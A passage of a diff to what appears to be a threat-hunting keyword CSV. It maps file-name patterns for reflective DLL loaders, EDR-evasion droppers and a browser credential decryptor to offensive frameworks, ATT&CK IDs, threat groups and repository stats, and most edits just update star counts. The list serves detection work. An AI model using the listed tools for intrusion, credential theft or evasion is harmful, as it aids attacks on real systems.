and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*reflective_dll_inject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*reflective_pe_loader.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*ReflectiveDll.*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" "*ReflectiveDll.x64.dll*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*ReflectiveDll.x86.dll*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" -"*ReflectiveDLLInjection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*ReflectiveDLLInjection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*ReflectiveDLLInjection.*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" "*ReflectiveDLLInjection.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*ReflectiveDLLInjection.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ReflectiveDllInjection.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*ReflectiveDLLInjection.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ReflectiveDllInjection.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*Reflective-HackBrowserData*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" -"*Reflective-HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8729","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*Reflective-HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" "*ReflectiveLoader.*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*ReflectiveLoader.c*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ReflectiveLoader.c*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*ReflectiveLoader.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ReflectiveLoader.h*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*ReflectiveLoader.c*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ReflectiveLoader.c*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*ReflectiveLoader.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ReflectiveLoader.h*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*ReflectiveNTDLL.cpp*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*ReflectiveNTDLL.exe*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - 
T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*ReflectiveNTDLL.sln*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*ReflectiveNTDLL.vcxproj*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*ReflectiveNtdll-main*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" -"*ReflectivePick_x64_orig.dll*","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1112","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ReflectivePick_x86_orig.dll*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1113","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ReflectivePick_x64_orig.dll*","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1112","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ReflectivePick_x86_orig.dll*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1113","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 